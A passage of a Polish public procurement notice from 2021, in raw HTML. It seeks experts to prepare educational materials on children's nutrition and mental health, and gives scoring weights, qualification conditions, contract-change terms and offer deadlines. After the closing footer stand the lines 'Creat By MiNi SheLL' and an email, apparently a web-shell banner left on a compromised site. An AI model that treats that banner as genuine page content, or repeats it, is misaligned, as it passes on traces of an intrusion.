class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie ekspertów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Ekspert odpowiedzialny za opracowanie treści materiałów edukacyjnych i promocyjnych dotyczących zdrowia psychicznego dzieci i młodzieżyPosiada co najmniej tytuł naukowy doktora z ukończoną specjalizacją z psychiatrii II stopnia - maksymalnie 20 pkt a)	Stopień naukowy doktora z ukończoną specjalizacją z psychiatrii II stopnia –10 pktb)	Tytuł naukowy profesora w dziedzinie psychiatrii- 20 pktPosiada dodatkowe doświadczenie zawodowe (większe niż 2 lata) w pracy z dziećmi i młodzieżą w wieku szkolnym (szkoła podstawowa lub szkoły ponadpodstawowe) - maksymalnie 20pkt	a)	3 lata doświadczenia – 15 pktb)	4 lat doświadczenia – 16 pktc)	5 lat doświadczenia – 17 pktd)	6 lat doświadczenia – 18 pkt e)	7 lat doświadczenia –19 pktf)	8 lat doświadczenia i więcej - 20 pkt Posiada dodatkowe doświadczenie (brał/bierze udział w więcej niż 24 godzin) w organizacji warsztatów dla rodziców lub nauczycieli lub opiekunów w dziedzinie zdrowia psychicznego dzieci i młodzieży - maksymalnie 15 pkt	a) 34 godzin warsztatów – 10 pkt b)	44 godzin warsztatów i więcej – 15 pkt Posiada dodatkowe doświadczenie w zakresie opracowania analogicznych materiałów, tzn. jest autorem lub współautorem więcej niż 1 publikacji lubartykułów poświęconych problematyce zaburzeń psychicznych dzieci i młodzieży - maksymalnie 10 pkt	a)	2 publikacje/artykuły- 5 pktb)	3 publikacji/artykułów - 6 pktc)	4 publikacji/artykułów - 7 pktd)	5 publikacji/artykułów - 8 pkte)	6 publikacji/artykułów – 9 pktf)	7 publikacji/artykułów i więcej- 10 pktPosiada znajomość języka angielskiego na poziomie powyżej B2 – max 5 pkt a)	Tak – 5 pkt b)	Nie – 0 pkt <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolności technicznej lub zawodowej - Zamawiający uzna warunek za spełniony, gdy Wykonawca dysponuje osobami wyznaczonymi do realizacji zamówienia spełniającymi warunki:Część I A.	ekspert zaangażowany do przygotowania i oceny programu szkoleniowego, dotyczącego zdrowych opcji w przedszkolach i żłobkach - 1 osoba:a)	posiada co najmniej tytuł magistra w obszarze nauk o żywieniu lub nauk o zdrowiu;b)	posiada co najmniej 3 letnie doświadczenie zawodowe w obszarze prawidłowego żywienia;c)	posiada doświadczenie (brał/bierze udział) w organizacji co najmniej 24 godziny warsztatów dla dzieci w zakresie zdrowego żywienia lub zdrowego stylu życia;d)	posiada udokumentowane doświadczenie w zakresie opracowania analogicznych programów szkoleniowych/scenariuszy zajęć dydaktyczno-warsztatowych, tzn. jest autorem lub współautorem co najmniej 1 programów/scenariuszy dotyczących zdrowego żywienia dla dzieci w żłobkach i przedszkolach;e)	posiada znajomość języka angielskiego na poziomie minimum B2 (ekspert powinien znać język angielski w stopniu zapewniającym prawidłową komunikację w języku angielskim w obszarze merytorycznym zamówienia).B.	ekspert zaangażowany do opracowania treści materiałów edukacyjnych i promocyjnych - 1 osoba:a)	posiada co najmniej tytuł magistra w obszarze nauk o żywieniu lub nauk o zdrowiu;b)	posiada co najmniej 3 letnie doświadczenie zawodowe w obszarze prawidłowego żywienia;c)	posiada doświadczenie (brał/bierze udział) w organizacji co najmniej 24 godziny warsztatów dla dzieci w zakresie zdrowego żywienia;d)	posiada udokumentowane doświadczenie w zakresie opracowania analogicznych materiałów, tzn. jest autorem lub współautorem co najmniej 1 publikacji lub artykułów poświęconych problematyce zdrowego żywienia dzieci w żłobkach i przedszkolach;e)	posiada znajomość języka angielskiego na poziomie minimum B2 (ekspert powinien znać język angielski w stopniu zapewniającym prawidłową komunikację w języku angielskim w obszarze merytorycznym zamówienia).Część IIEkspert odpowiedzialny za opracowanie treści materiałów edukacyjnych i promocyjnych dotyczących zdrowia psychicznego dzieci i młodzieży- 1 osoba:a)	posiada co najmniej tytuł magistra psychologii lub ukończone studia na kierunku lekarskim wraz z ukończoną specjalizacją z psychiatrii lub psychiatrii dzieci i młodzieży, b)	posiada co najmniej 2-letnie doświadczenie zawodowe w pracy z dziećmi i młodzieżą w wieku szkolnym (szkoła podstawowa lub szkoły ponadpodstawowe);c)	posiada doświadczenie (brał/bierze udział) w organizacji co najmniej 24 godzin warsztatów dla rodziców lub nauczycieli lub opiekunów w dziedzinie zdrowia psychicznego dzieci i młodzieży,d)	posiada doświadczenie w zakresie opracowania analogicznych materiałów, tzn. jest autorem lub współautorem co najmniej 1 publikacji lub artykułu poświęconych problematyce zaburzeń psychicznych dzieci i młodzieży,e)	posiada znajomość języka angielskiego co najmniej na poziomie B2 (ekspert powinien znać język angielski w stopniu zapewniającym prawidłową komunikację w języku angielskim w obszarze merytorycznym zamówienia). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość wprowadzenia zmian do umowy w zakresie: 1)	przedłużenia terminów wykonania przedmiotu umowy (w zakresie któregokolwiek z jego elementów, wskazanych w § 1 ust. 2 pkt od 1 do 6), określonych odpowiednio w § 2 ust. 1 pkt 1 lub pkt 2 lub pkt 3 lub pkt 4 lub pkt 5 w przypadku: a)	wystąpienia okoliczności, trudnych do przewidzenia w chwili zawarcia umowy, a które uniemożliwiają wykonanie przedmiotu umowy w terminach określonych odpowiednio w § 2 ust. 1 pkt 1 lub pkt 2 lub pkt 3 lub pkt 4 lub pkt 5 i które są niezawinione przez Wykonawcę, w tym w szczególności okoliczności powstających na skutek zdarzeń losowych, siły wyższej lub zagrożenia epidemicznego, których skutki mają przełożenie na terminową realizację przedmiotu umowy, b)	wystąpienia opóźnień po stronie Zamawiającego (w tym po stronie Partnera z Królestwa Norwegii), które uniemożliwiają Wykonawcy realizację przedmiotu umowy w terminie, określonym odpowiednio w § 2 ust. 1 pkt 1 lub pkt 2 lub pkt 3 lub pkt 4 lub pkt 5,- odpowiednio do zaistniałych okoliczności lub opóźnień po stronie Zamawiającego, ale nie więcej niż o 33% danego terminu (obliczonego w tygodniach, zaczynając od dnia zawarcia umowy, a kończąc na ostatnim dniu ostatniego tygodnia wskazanego odpowiednio w § 2 ust. 1 pkt 1 lub pkt 2 lub pkt 3 lub pkt 4 lub wskazanego datą kalendarzową w pkt 5), zaokrąglając do pełnego tygodnia w górę;2) zaistnienia obowiązku wykonania uzupełnień, konsultacji, poprawek, doprecyzowania lub usprawnień przedmiotu umowy, przy czym zmiana może dotyczyć zakresu wykonywanej usługi w stopniu nie wykraczającym poza zakres przedmiotu umowy zawarty w OPZ;3) zmiany wynikającej z omyłki pisarskiej, rachunkowej, lub innej oczywistej omyłki, poprzez poprawienie zaistniałych omyłek;4) powstania rozbieżności lub niejasności w rozumieniu pojęć lub sformułowań użytych w umowie lub OPZ w celu jednoznacznego rozumienia zapisów, których nie będzie można usunąć w inny sposób, a zmiana których będzie umożliwiać usunięcie tych rozbieżności;5) zmiany formy organizacyjno – prawnej, przekształcenia lub połączenia z inną firmą po stronie Wykonawcy lub zmiany nazwy Wykonawcy lub w wyniku sukcesji, wstępując w prawa i obowiązki Wykonawcy, w następstwie przejęcia, połączenia, podziału, przekształcenia, upadłości, restrukturyzacji, dziedziczenia lub nabycia dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy, a także nie ma na celu uniknięcia stosowania Wytycznych w zakresie udzielania zamówień w ramach Mechanizmu Finansowego EOG na lata 2014-2021 oraz Norweskiego Mechanizmu Finansowego na lata 2014-2021;6) określonym w art. 455 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (poz. 2019, z późn. zm.). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-05-14 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia-mz.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-05-14 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-06-14</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-04-30 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com